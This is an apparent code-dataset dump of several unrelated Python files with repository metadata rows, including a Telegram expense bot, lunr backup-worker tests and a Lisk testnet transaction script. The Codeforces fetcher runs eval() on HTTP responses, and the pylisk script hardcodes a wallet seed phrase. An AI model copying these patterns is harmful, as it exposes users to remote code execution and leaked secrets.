sl_cur.close() | 22.946429 | 63 | 0.631907 | 197 | 1,285 | 4 | 0.335025 | 0.088832 | 0.106599 | 0.068528 | 0.408629 | 0.379442 | 0.379442 | 0.310914 | 0.310914 | 0.310914 | 0 | 0.01712 | 0.227237 | 1,285 | 56 | 64 | 22.946429 | 0.776435 | 0.171984 | 0 | 0.425 | 0 | 0.025 | 0.497006 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.025 | 0 | 0.025 | 0.075 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9e3c1de91dc697b91606440bb81f175a4344975 | 4,679 | py | Python | code/edit.py | Seeyapm/MyDollarBot-BOTGo | f26b6ee49a2497406e2f8c783368164d6c386d28 | [
"MIT"
] | 1 | 2021-12-01T06:47:35.000Z | 2021-12-01T06:47:35.000Z | code/edit.py | Seeyapm/MyDollarBot-BOTGo | f26b6ee49a2497406e2f8c783368164d6c386d28 | [
"MIT"
] | 37 | 2021-11-04T05:41:29.000Z | 2021-11-05T03:31:44.000Z | code/edit.py | sak007/MyDollarBot | f26b6ee49a2497406e2f8c783368164d6c386d28 | [
"MIT"
] | 5 | 2021-11-18T18:23:50.000Z | 2022-01-09T16:02:50.000Z | import re
import helper
from telebot import types
def run(m, bot):
chat_id = m.chat.id
markup = types.ReplyKeyboardMarkup(one_time_keyboard=True)
markup.row_width = 2
for c in helper.getUserHistory(chat_id):
expense_data = c.split(',')
str_date = "Date=" + expense_data[0]
str_category = ",\t\tCategory=" + expense_data[1]
str_amount = ",\t\tAmount=$" + expense_data[2]
markup.add(str_date + str_category + str_amount)
info = bot.reply_to(m, "Select expense to be edited:", reply_markup=markup)
bot.register_next_step_handler(info, select_category_to_be_updated, bot)
def select_category_to_be_updated(m, bot):
info = m.text
markup = types.ReplyKeyboardMarkup(one_time_keyboard=True)
markup.row_width = 2
selected_data = [] if info is None else info.split(',')
for c in selected_data:
markup.add(c.strip())
choice = bot.reply_to(m, "What do you want to update?", reply_markup=markup)
bot.register_next_step_handler(choice, enter_updated_data, bot, selected_data)
def enter_updated_data(m, bot, selected_data):
choice1 = "" if m.text is None else m.text
markup = types.ReplyKeyboardMarkup(one_time_keyboard=True)
markup.row_width = 2
for cat in helper.getSpendCategories():
markup.add(cat)
if 'Date' in choice1:
new_date = bot.reply_to(m, "Please enter the new date (in dd-mmm-yyy format)")
bot.register_next_step_handler(new_date, edit_date, bot, selected_data)
if 'Category' in choice1:
new_cat = bot.reply_to(m, "Please select the new category", reply_markup=markup)
bot.register_next_step_handler(new_cat, edit_cat, bot, selected_data)
if 'Amount' in choice1:
new_cost = bot.reply_to(m, "Please type the new cost")
bot.register_next_step_handler(new_cost, edit_cost, bot, selected_data)
def edit_date(m, bot, selected_data):
user_list = helper.read_json()
new_date = "" if m.text is None else m.text
date_format = r'^(([0][1-9])|([1-2][0-9])|([3][0-1]))\-(Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\-\d{4}$'
x1 = re.search(date_format, new_date)
if x1 is None:
bot.reply_to(m, "The date is incorrect")
return
chat_id = m.chat.id
data_edit = helper.getUserHistory(chat_id)
for i in range(len(data_edit)):
user_data = data_edit[i].split(',')
selected_date = selected_data[0].split('=')[1]
selected_category = selected_data[1].split('=')[1]
selected_amount = selected_data[2].split('=')[1]
if user_data[0] == selected_date and user_data[1] == selected_category and user_data[2] == selected_amount[1:]:
data_edit[i] = new_date + ',' + selected_category + ',' + selected_amount[1:]
break
user_list[str(chat_id)]['data'] = data_edit
helper.write_json(user_list)
bot.reply_to(m, "Date is updated")
def edit_cat(m, bot, selected_data):
user_list = helper.read_json()
chat_id = m.chat.id
data_edit = helper.getUserHistory(chat_id)
new_cat = "" if m.text is None else m.text
for i in range(len(data_edit)):
user_data = data_edit[i].split(',')
selected_date = selected_data[0].split('=')[1]
selected_category = selected_data[1].split('=')[1]
selected_amount = selected_data[2].split('=')[1]
if user_data[0] == selected_date and user_data[1] == selected_category and user_data[2] == selected_amount[1:]:
data_edit[i] = selected_date + ',' + new_cat + ',' + selected_amount[1:]
break
user_list[str(chat_id)]['data'] = data_edit
helper.write_json(user_list)
bot.reply_to(m, "Category is updated")
def edit_cost(m, bot, selected_data):
user_list = helper.read_json()
new_cost = "" if m.text is None else m.text
chat_id = m.chat.id
data_edit = helper.getUserHistory(chat_id)
if helper.validate_entered_amount(new_cost) != 0:
for i in range(len(data_edit)):
user_data = data_edit[i].split(',')
selected_date = selected_data[0].split('=')[1]
selected_category = selected_data[1].split('=')[1]
selected_amount = selected_data[2].split('=')[1]
if user_data[0] == selected_date and user_data[1] == selected_category and user_data[2] == selected_amount[1:]:
data_edit[i] = selected_date + ',' + selected_category + ',' + new_cost
break
user_list[str(chat_id)]['data'] = data_edit
helper.write_json(user_list)
bot.reply_to(m, "Expense amount is updated")
else:
bot.reply_to(m, "The cost is invalid")
return
| 40.686957 | 123 | 0.653131 | 699 | 4,679 | 4.11588 | 0.157368 | 0.079249 | 0.034758 | 0.038234 | 0.636774 | 0.587417 | 0.566215 | 0.566215 | 0.492527 | 0.479319 | 0 | 0.015222 | 0.213721 | 4,679 | 114 | 124 | 41.04386 | 0.766784 | 0 | 0 | 0.46875 | 0 | 0.010417 | 0.092755 | 0.020517 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.03125 | 0 | 0.114583 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9e45a9537e83bc6e4c763dbf8b21bd0ddb46129 | 802 | py | Python | board/utility.py | ben741863140/cfsystem | 227e269f16533719251962f4d8caee8b51091d2f | [
"Apache-2.0"
] | 4 | 2018-02-22T01:59:07.000Z | 2020-07-09T06:28:46.000Z | board/utility.py | ben741863140/cfsystem | 227e269f16533719251962f4d8caee8b51091d2f | [
"Apache-2.0"
] | null | null | null | board/utility.py | ben741863140/cfsystem | 227e269f16533719251962f4d8caee8b51091d2f | [
"Apache-2.0"
] | null | null | null | import requests
from bs4 import BeautifulSoup
def get_rating(handle):
handle = str(handle)
url = 'http://codeforces.com/api/user.info?handles=' + handle
results = BeautifulSoup(requests.get(url).text, 'html.parser').text
results = eval(results)
if results['status'] != 'OK':
results['comment'] = 'handle: ' + handle + ' 不存在'
return results
info = results['result'][0]
if 'rating' not in info.keys():
info['rating'] = 0
res = {'status': 'OK', 'rating': info['rating']}
return res
def get_rating_change(handle):
print(handle)
url = 'http://codeforces.com/api/user.rating?handle=' + str(handle)
temp = requests.get(url)
results = BeautifulSoup(temp.text, 'html.parser').text
return eval(results)
| 30.846154 | 72 | 0.617207 | 97 | 802 | 5.072165 | 0.391753 | 0.02439 | 0.04878 | 0.093496 | 0.134146 | 0.134146 | 0.134146 | 0 | 0 | 0 | 0 | 0.004847 | 0.22818 | 802 | 25 | 73 | 32.08 | 0.789984 | 0 | 0 | 0 | 0 | 0 | 0.226512 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.095238 | 0 | 0.333333 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9e509c7d64ad4f3481c6bd6a8b0e4e0168ff090 | 11,320 | py | Python | testlunr/unit/storage/helper/utils/test_worker.py | PythonGirlSam/lunr | 9476436a46d377fab26674d41ac7444d98df1cbd | [
"Apache-2.0"
] | 6 | 2015-11-09T14:16:26.000Z | 2018-04-05T14:27:35.000Z | testlunr/unit/storage/helper/utils/test_worker.py | PythonGirlSam/lunr | 9476436a46d377fab26674d41ac7444d98df1cbd | [
"Apache-2.0"
] | 16 | 2016-01-28T20:16:47.000Z | 2019-03-07T07:30:29.000Z | testlunr/unit/storage/helper/utils/test_worker.py | SaumyaRackspace/lunr | 9476436a46d377fab26674d41ac7444d98df1cbd | [
"Apache-2.0"
] | 18 | 2015-10-23T10:10:52.000Z | 2020-12-15T07:11:52.000Z | #!/usr/bin/env python
# Copyright (c) 2011-2016 Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import multiprocessing
import os
from tempfile import mkdtemp
from shutil import rmtree
from time import sleep
import json
from lunr.common.config import LunrConfig
from lunr.common.lock import JsonLockFile
from lunr.storage.helper.utils import get_conn
from lunr.storage.helper.utils.client.memory import ClientException, reset
from lunr.storage.helper.utils.manifest import Manifest, save_manifest
from lunr.storage.helper.utils.worker import Worker, SaveProcess,\
StatsSaveProcess, RestoreProcess, StatsRestoreProcess, Block
class MockCinder(object):
def __init__(self):
self.snapshot_progress_called = 0
self.update_volume_metadata_called = 0
def snapshot_progress(self, *args, **kwargs):
self.snapshot_progress_called += 1
def update_volume_metadata(self, *args, **kwargs):
self.update_volume_metadata_called += 1
class TestStatsRestoreProcess(unittest.TestCase):
def setUp(self):
self.cinder = MockCinder()
self.scratch = mkdtemp()
self.stats_path = os.path.join(self.scratch, 'stats')
self.stat_queue = multiprocessing.Queue()
with JsonLockFile(self.stats_path) as lock:
self.stats_lock = lock
self.volume_id = 'volume_id'
self.block_count = 10
self.process = StatsRestoreProcess(
self.cinder, self.volume_id, self.stat_queue,
self.block_count, self.stats_lock, update_interval=1)
self.process.start()
def tearDown(self):
rmtree(self.scratch)
self.assertFalse(self.process.is_alive())
def test_restored(self):
blocks_restored = 3
for i in xrange(blocks_restored):
task = ('restored', 1)
self.stat_queue.put(task)
self.stat_queue.put(None)
while self.process.is_alive():
sleep(0.1)
with open(self.stats_path) as f:
stats = json.loads(f.read())
self.assertEqual(stats['block_count'], self.block_count)
self.assertEqual(stats['blocks_restored'], blocks_restored)
percent = 3 * 100.0 / 10
self.assertEqual(stats['progress'], percent)
class TestStatsSaveProcess(unittest.TestCase):
def setUp(self):
self.cinder = MockCinder()
self.scratch = mkdtemp()
self.stats_path = os.path.join(self.scratch, 'stats')
self.stat_queue = multiprocessing.Queue()
with JsonLockFile(self.stats_path) as lock:
self.stats_lock = lock
self.backup_id = 'backup_id'
self.block_count = 10
self.process = StatsSaveProcess(
self.cinder, self.backup_id, self.stat_queue,
self.block_count, self.stats_lock, update_interval=1)
self.process.start()
def tearDown(self):
rmtree(self.scratch)
self.assertFalse(self.process.is_alive())
def test_read(self):
blocks_read = 8
for i in xrange(blocks_read):
task = ('read', 1)
self.stat_queue.put(task)
self.stat_queue.put(None)
while self.process.is_alive():
sleep(0.1)
with open(self.stats_path) as f:
stats = json.loads(f.read())
self.assertEqual(stats['blocks_read'], blocks_read)
self.assertEqual(stats['block_count'], self.block_count)
self.assertEqual(stats['upload_count'], self.block_count)
self.assertEqual(stats['blocks_uploaded'], 0)
percent = (8 + 0) * 100.0 / (10 + 10)
self.assertEqual(stats['progress'], percent)
def test_uploaded(self):
blocks_uploaded = 3
for i in xrange(blocks_uploaded):
task = ('uploaded', 1)
self.stat_queue.put(task)
self.stat_queue.put(None)
while self.process.is_alive():
sleep(0.1)
with open(self.stats_path) as f:
stats = json.loads(f.read())
self.assertEqual(stats['blocks_read'], 0)
self.assertEqual(stats['block_count'], self.block_count)
self.assertEqual(stats['upload_count'], self.block_count)
self.assertEqual(stats['blocks_uploaded'], blocks_uploaded)
percent = (0 + 3) * 100.0 / (10 + 10)
self.assertEqual(stats['progress'], percent)
def test_upload_count(self):
upload_count = 7
task = ('upload_count', upload_count)
self.stat_queue.put(task)
blocks_uploaded = 3
for i in xrange(blocks_uploaded):
task = ('uploaded', 1)
self.stat_queue.put(task)
self.stat_queue.put(None)
while self.process.is_alive():
sleep(0.1)
with open(self.stats_path) as f:
stats = json.loads(f.read())
self.assertEqual(stats['blocks_read'], 0)
self.assertEqual(stats['block_count'], self.block_count)
self.assertEqual(stats['upload_count'], upload_count)
self.assertEqual(stats['blocks_uploaded'], 3)
percent = (0 + 3) * 100.0 / (10 + 7)
self.assertEqual(stats['progress'], percent)
class TestSaveProcess(unittest.TestCase):
def setUp(self):
self.block_queue = multiprocessing.JoinableQueue()
self.result_queue = multiprocessing.Queue()
self.stat_queue = multiprocessing.Queue()
self.volume_id = 'volume_id'
self.scratch = mkdtemp()
backup_path = os.path.join(self.scratch, 'backups')
self.conf = LunrConfig({
'backup': {'client': 'disk'},
'disk': {'path': backup_path},
})
self.conn = get_conn(self.conf)
self.conn.put_container(self.volume_id)
self.process = SaveProcess(self.conf, self.volume_id,
self.block_queue, self.result_queue,
self.stat_queue)
self.process.start()
def tearDown(self):
rmtree(self.scratch)
self.assertFalse(self.process.is_alive())
def test_upload(self):
dev = '/dev/zero'
salt = 'salt'
block_count = 3
for i in xrange(block_count):
block = Block(dev, i, salt)
# Lie about the hash.
block._hydrate()
hash_ = "hash_%s" % i
block._hash = hash_
self.block_queue.put(block)
self.block_queue.put(None)
while self.process.is_alive():
sleep(0.1)
stats, errors = self.result_queue.get()
self.assertEquals(stats['uploaded'], block_count)
self.assertEquals(len(errors.keys()), 0)
headers, listing = self.conn.get_container(self.volume_id)
self.assertEquals(len(listing), block_count)
class TestWorker(unittest.TestCase):
def setUp(self):
reset()
self.scratch = mkdtemp()
def tearDown(self):
rmtree(self.scratch)
def test_salt_empty_blocks(self):
vol1 = 'vol1'
vol2 = 'vol2'
manifest1 = Manifest()
manifest2 = Manifest()
conf = LunrConfig({'backup': {'client': 'memory'}})
worker1 = Worker(vol1, conf, manifest1)
worker2 = Worker(vol1, conf, manifest2)
self.assert_(worker1.manifest.salt != worker2.manifest.salt)
self.assert_(worker1.empty_block_hash != worker2.empty_block_hash)
self.assertEquals(worker1.empty_block, worker2.empty_block)
def test_delete_with_missing_blocks(self):
stats_path = os.path.join(self.scratch, 'stats')
manifest = Manifest.blank(2)
worker = Worker('foo',
LunrConfig({
'backup': {'client': 'memory'},
'storage': {'run_dir': self.scratch}
}),
manifest=manifest)
conn = worker.conn
conn.put_container('foo')
backup = manifest.create_backup('bak1')
backup[0] = worker.empty_block_hash
backup[1] = 'some_random_block_that_isnt_uploaded'
save_manifest(manifest, conn, worker.id, worker._lock_path())
obj = conn.get_object('foo', 'manifest', newest=True)
self.assertRaises(ClientException, conn.get_object,
'foo', backup[0], newest=True)
self.assertRaises(ClientException, conn.get_object,
'foo', backup[1], newest=True)
# Shouldn't blow up on 404.
worker.delete('bak1')
# Manifest should still be nicely deleted.
self.assertRaises(ClientException, conn.get_object,
'foo', 'manifest', newest=True)
def test_audit(self):
manifest = Manifest.blank(2)
worker = Worker('foo',
LunrConfig({
'backup': {'client': 'memory'},
'storage': {'run_dir': self.scratch}
}),
manifest=manifest)
conn = worker.conn
conn.put_container('foo')
backup = manifest.create_backup('bak1')
backup[0] = worker.empty_block_hash
conn.put_object('foo', backup[0], 'zeroes')
backup[1] = 'some_block_hash'
conn.put_object('foo', backup[1], ' more stuff')
save_manifest(manifest, conn, worker.id, worker._lock_path())
# Add some non referenced blocks.
conn.put_object('foo', 'stuff1', 'unreferenced stuff1')
conn.put_object('foo', 'stuff2', 'unreferenced stuff2')
conn.put_object('foo', 'stuff3', 'unreferenced stuff3')
_headers, original_list = conn.get_container('foo')
# Manifest, 2 blocks, 3 stuffs.
self.assertEquals(len(original_list), 6)
worker.audit()
_headers, new_list = conn.get_container('foo')
# Manifest, 2 blocks.
self.assertEquals(len(new_list), 3)
def test_save_stats(self):
manifest = Manifest.blank(2)
stats_path = os.path.join(self.scratch, 'statsfile')
worker = Worker('foo',
LunrConfig({
'backup': {'client': 'memory'},
'storage': {'run_dir': self.scratch}
}),
manifest=manifest,
stats_path=stats_path)
conn = worker.conn
conn.put_container('foo')
worker.save('/dev/zero', 'backup_id', timestamp=1)
try:
with open(stats_path) as f:
json.loads(f.read())
except ValueError:
self.fail("stats path does not contain valid json")
if __name__ == "__main__":
unittest.main()
| 37.359736 | 74 | 0.599205 | 1,302 | 11,320 | 5.050691 | 0.188172 | 0.027372 | 0.054745 | 0.021898 | 0.562804 | 0.50441 | 0.460158 | 0.420164 | 0.407695 | 0.387774 | 0 | 0.016131 | 0.288074 | 11,320 | 302 | 75 | 37.483444 | 0.799851 | 0.066519 | 0 | 0.487705 | 0 | 0 | 0.07235 | 0.003414 | 0 | 0 | 0 | 0 | 0.131148 | 1 | 0.081967 | false | 0 | 0.053279 | 0 | 0.155738 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9e5663a61967eebf2017ef64a32596ecc3c2534 | 3,112 | py | Python | server/tests/unit/eb/test_eb.py | mdylan2/single-cell-explorer | 775e59fcf5c105bbe70edd17dbf1d2153c4f662c | [
"MIT"
] | 2 | 2021-08-30T16:32:16.000Z | 2022-03-25T22:36:23.000Z | server/tests/unit/eb/test_eb.py | mdylan2/single-cell-explorer | 775e59fcf5c105bbe70edd17dbf1d2153c4f662c | [
"MIT"
] | 194 | 2021-08-18T23:52:44.000Z | 2022-03-30T19:40:41.000Z | server/tests/unit/eb/test_eb.py | mdylan2/single-cell-explorer | 775e59fcf5c105bbe70edd17dbf1d2153c4f662c | [
"MIT"
] | 1 | 2022-01-21T09:20:15.000Z | 2022-01-21T09:20:15.000Z | import os
from unittest.mock import patch
import requests
import subprocess
import tempfile
import time
import unittest
from contextlib import contextmanager
from server.common.config.app_config import AppConfig
from server.tests import PROJECT_ROOT, FIXTURES_ROOT
@contextmanager
def run_eb_app(tempdirname):
ps = subprocess.Popen(["python", "artifact.dir/application.py"], cwd=tempdirname)
server = "http://localhost:5000"
for _ in range(10):
try:
requests.get(f"{server}/health")
break
except requests.exceptions.ConnectionError:
time.sleep(1)
try:
yield server
finally:
try:
ps.terminate()
except ProcessLookupError:
pass
class Elastic_Beanstalk_Test(unittest.TestCase):
def test_run(self):
tempdir = tempfile.TemporaryDirectory(dir=f"{PROJECT_ROOT}/server")
tempdirname = tempdir.name
config = AppConfig()
# test that eb works
config.update_server_config(multi_dataset__dataroot=f"{FIXTURES_ROOT}", app__flask_secret_key="open sesame")
config.complete_config()
config.write_config(f"{tempdirname}/config.yaml")
subprocess.check_call(f"git ls-files . | cpio -pdm {tempdirname}", cwd=f"{PROJECT_ROOT}/server/eb", shell=True)
subprocess.check_call(["make", "build"], cwd=tempdirname)
with run_eb_app(tempdirname) as server:
session = requests.Session()
response = session.get(f"{server}/d/pbmc3k.cxg/api/v0.2/config")
data_config = response.json()
assert data_config["config"]["displayNames"]["dataset"] == "pbmc3k"
def test_config(self):
check_config_script = os.path.join(PROJECT_ROOT, "server", "eb", "check_config.py")
with tempfile.TemporaryDirectory() as tempdir:
configfile = os.path.join(tempdir, "config.yaml")
app_config = AppConfig()
app_config.update_server_config(multi_dataset__dataroot=f"{FIXTURES_ROOT}")
app_config.write_config(configfile)
command = ["python", check_config_script, configfile]
# test failure mode (flask_secret_key not set)
env = os.environ.copy()
env.pop("CXG_SECRET_KEY", None)
env["PYTHONPATH"] = PROJECT_ROOT
with self.assertRaises(subprocess.CalledProcessError) as exception_context:
subprocess.check_output(command, env=env)
output = str(exception_context.exception.stdout, "utf-8")
self.assertTrue(
output.startswith(
"Error: Invalid type for attribute: app__flask_secret_key, expected type str, got NoneType"
),
f"Actual: {output}",
)
self.assertEqual(exception_context.exception.returncode, 1)
# test passing case
env["CXG_SECRET_KEY"] = "secret"
output = subprocess.check_output(command, env=env)
output = str(output, "utf-8")
self.assertTrue(output.startswith("PASS"))
| 37.493976 | 119 | 0.641067 | 347 | 3,112 | 5.570605 | 0.40634 | 0.028453 | 0.026384 | 0.019659 | 0.141749 | 0.141749 | 0.10657 | 0.10657 | 0.06208 | 0.06208 | 0 | 0.006037 | 0.25482 | 3,112 | 82 | 120 | 37.95122 | 0.827512 | 0.026028 | 0 | 0.044776 | 0 | 0 | 0.16518 | 0.051536 | 0 | 0 | 0 | 0 | 0.074627 | 1 | 0.044776 | false | 0.029851 | 0.149254 | 0 | 0.208955 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9e6e31bd3c6e72131078bf0a6956ecb4db026ee | 649 | py | Python | scheduling/common/input.py | makspll/OS-Scripts | 021b0a569ee0e64cb8a8e23cdd5b7ea6104a8d99 | [
"MIT"
] | null | null | null | scheduling/common/input.py | makspll/OS-Scripts | 021b0a569ee0e64cb8a8e23cdd5b7ea6104a8d99 | [
"MIT"
] | null | null | null | scheduling/common/input.py | makspll/OS-Scripts | 021b0a569ee0e64cb8a8e23cdd5b7ea6104a8d99 | [
"MIT"
] | null | null | null |
from typing import List
from enum import Enum
from .units import Process, Unit, Track
class Mode(Enum):
PROCESS = 0
DISK = 1
PAGE = 2
class Reader():
def __init__(self) -> None:
pass
def read(self,mode : Mode, path : str ) -> List[Unit]:
with open(path,"r") as f:
creator = None
if mode == Mode.PROCESS:
creator = lambda str : Process.parse(str)
elif mode == Mode.DISK:
creator = lambda str : Track.parse(str)
units = []
for l in f.readlines():
units.append(creator(l))
return units
| 20.935484 | 58 | 0.522342 | 79 | 649 | 4.240506 | 0.518987 | 0.071642 | 0.095522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007426 | 0.377504 | 649 | 30 | 59 | 21.633333 | 0.821782 | 0 | 0 | 0 | 0 | 0 | 0.001548 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0.047619 | 0.142857 | 0 | 0.52381 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9e73606f7f41fdb21cfe2e7660f8da5614d729c | 957 | py | Python | pylisk/create_transaction.py | t-kimber/PyLisk | b303221eae5af85577866b61a665d58219f121cd | [
"MIT"
] | null | null | null | pylisk/create_transaction.py | t-kimber/PyLisk | b303221eae5af85577866b61a665d58219f121cd | [
"MIT"
] | 12 | 2021-12-15T13:21:06.000Z | 2022-01-26T13:05:38.000Z | pylisk/create_transaction.py | t-kimber/pylisk | b303221eae5af85577866b61a665d58219f121cd | [
"MIT"
] | null | null | null | """
Script to create a transaction.
"""
from hashlib import sha256
from pylisk.transaction import BalanceTransferTransaction
from pylisk.account import Account
def main():
address = "lskjks9w7v7wd6kg5gkt9eq5tvzu2w5vwfdc3ptkw"
acc = Account.from_info({"address": address})
bal_trs = BalanceTransferTransaction(
nonce=acc.nonce,
sender_public_key=acc.public_key,
recipient_bin_add=acc.bin_address,
amount=100000000,
)
NETWORK_ID = {
"testnet": bytes.fromhex(
"15f0dacc1060e91818224a94286b13aa04279c640bd5d6f193182031d133df7c"
),
}
seed_phrase_1 = (
"slight decline reward exist rib zebra multiply anger display alpha raccoon sing"
)
seed_1 = sha256(seed_phrase_1.encode()).digest()
bal_trs.sign(seed=seed_1, net_id=NETWORK_ID["testnet"])
hex_trs = bal_trs.serialize().hex()
print(f"{hex_trs=}")
if __name__ == "__main__":
main()
| 23.925 | 89 | 0.687565 | 103 | 957 | 6.106796 | 0.582524 | 0.028617 | 0.050874 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098274 | 0.213166 | 957 | 39 | 90 | 24.538462 | 0.737052 | 0.032393 | 0 | 0 | 0 | 0 | 0.243184 | 0.114504 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.115385 | 0 | 0.153846 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9ee3e2d59a60ee5b5ca120d2e41aae3d0a460cf | 256 | py | Python | submissions/abc120/b.py | m-star18/atcoder | 08e475810516602fa088f87daf1eba590b4e07cc | [
"Unlicense"
] | 1 | 2021-05-10T01:16:28.000Z | 2021-05-10T01:16:28.000Z | submissions/abc120/b.py | m-star18/atcoder | 08e475810516602fa088f87daf1eba590b4e07cc | [
"Unlicense"
] | 3 | 2021-05-11T06:14:15.000Z | 2021-06-19T08:18:36.000Z | submissions/abc120/b.py | m-star18/atcoder | 08e475810516602fa088f87daf1eba590b4e07cc | [
"Unlicense"
] | null | null | null | a, b, k = map(int, input().split())
mx = max(a, b)
match, ans = 0, 0
for i in range(mx):
if ((a % (mx - i)) == 0) and ((b % (mx - i)) == 0):
match += 1
ans = mx - i
if match == k:
break
print(ans)
| 18.285714 | 55 | 0.378906 | 41 | 256 | 2.365854 | 0.512195 | 0.092784 | 0.082474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033784 | 0.421875 | 256 | 13 | 56 | 19.692308 | 0.621622 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9f61c14f73a64dee1f29930eb0caeda4f5890cd | 815 | py | Python | h2o-py/tests/testdir_algos/glm/pyunit_PUBDEV_6853_glm_plot.py | ahmedengu/h2o-3 | ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11 | [
"Apache-2.0"
] | 6,098 | 2015-05-22T02:46:12.000Z | 2022-03-31T16:54:51.000Z | h2o-py/tests/testdir_algos/glm/pyunit_PUBDEV_6853_glm_plot.py | ahmedengu/h2o-3 | ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11 | [
"Apache-2.0"
] | 2,517 | 2015-05-23T02:10:54.000Z | 2022-03-30T17:03:39.000Z | h2o-py/tests/testdir_algos/glm/pyunit_PUBDEV_6853_glm_plot.py | ahmedengu/h2o-3 | ac2c0a6fbe7f8e18078278bf8a7d3483d41aca11 | [
"Apache-2.0"
] | 2,199 | 2015-05-22T04:09:55.000Z | 2022-03-28T22:20:45.000Z | from __future__ import print_function
import sys
sys.path.insert(1,"../../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.glm import H2OGeneralizedLinearEstimator
def test_glm_plot():
training_data = h2o.import_file(pyunit_utils.locate("smalldata/logreg/benign.csv"))
Y = 3
X = [0, 1, 2, 4, 5, 6, 7, 8, 9, 10]
model = H2OGeneralizedLinearEstimator(family="binomial", alpha=0, Lambda=1e-5)
model.train(x=X, y=Y, training_frame=training_data)
model.plot(metric="objective", server=True) # make sure graph will not show.
try:
model.plot(metric="auc")
sys.exit(1) # should have invoked an error
except:
sys.exit(0) # no problem
if __name__ == "__main__":
pyunit_utils.standalone_test(test_glm_plot)
else:
test_glm_plot()
| 30.185185 | 87 | 0.687117 | 117 | 815 | 4.555556 | 0.623932 | 0.061914 | 0.061914 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034743 | 0.18773 | 815 | 26 | 88 | 31.346154 | 0.770393 | 0.08589 | 0 | 0 | 0 | 0 | 0.08637 | 0.036437 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.272727 | 0 | 0.318182 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9f972e3f0ce11289703edace28d7d79fca045c9 | 4,521 | py | Python | tutorials/03_exact_integration_simple.py | TruongQuocChien/FFTHomPy | 2c23c80dd2cab46f1090103e613b4f886b3daac7 | [
"MIT"
] | 18 | 2015-03-14T20:08:57.000Z | 2021-01-25T11:08:40.000Z | tutorials/03_exact_integration_simple.py | vondrejc/FFTHomPy | 2c23c80dd2cab46f1090103e613b4f886b3daac7 | [
"MIT"
